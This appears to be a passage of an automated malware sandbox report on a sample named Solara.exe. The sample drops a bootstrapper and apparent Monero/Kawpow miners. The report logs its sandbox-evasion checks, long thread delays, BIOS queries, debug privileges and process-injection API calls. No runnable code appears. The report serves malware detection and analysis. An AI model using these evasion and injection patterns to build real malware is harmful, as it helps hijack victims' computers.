Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,51_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 2700000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 48A0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599813
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599648
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599500
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599364
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599224
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599095
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598956
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598828
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598700
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598584
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598404
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5470Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 875Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4966Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 359
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4419Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 432
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3620
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4205
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4182
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5339
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4659
Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_51-480
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeAPI coverage: 0.3 %
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeAPI coverage: 0.3 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4720Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep count: 4966 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep count: 222 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep count: 5178 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 359 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep count: 4419 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 363 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599648s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -599095s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -598956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -598700s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -598584s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384Thread sleep time: -598404s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7192Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 3652Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 4205 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 4182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 207 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7592Thread sleep count: 5339 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7592Thread sleep time: -5339000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7592Thread sleep count: 4659 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7592Thread sleep time: -4659000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8247DCE0 FindFirstFileExW,19_2_0000027E8247DCE0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A8DCE0 FindFirstFileExW,22_2_0000012C42A8DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589BDCE0 FindFirstFileExW,66_2_000001E8589BDCE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599813
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599648
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599500
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599364
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599224
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599095
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598956
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598828
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598700
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598584
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598404
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_51-413
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_52-395
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82477D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E82477D90
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82471628 GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,19_2_0000027E82471628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00401509 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401509
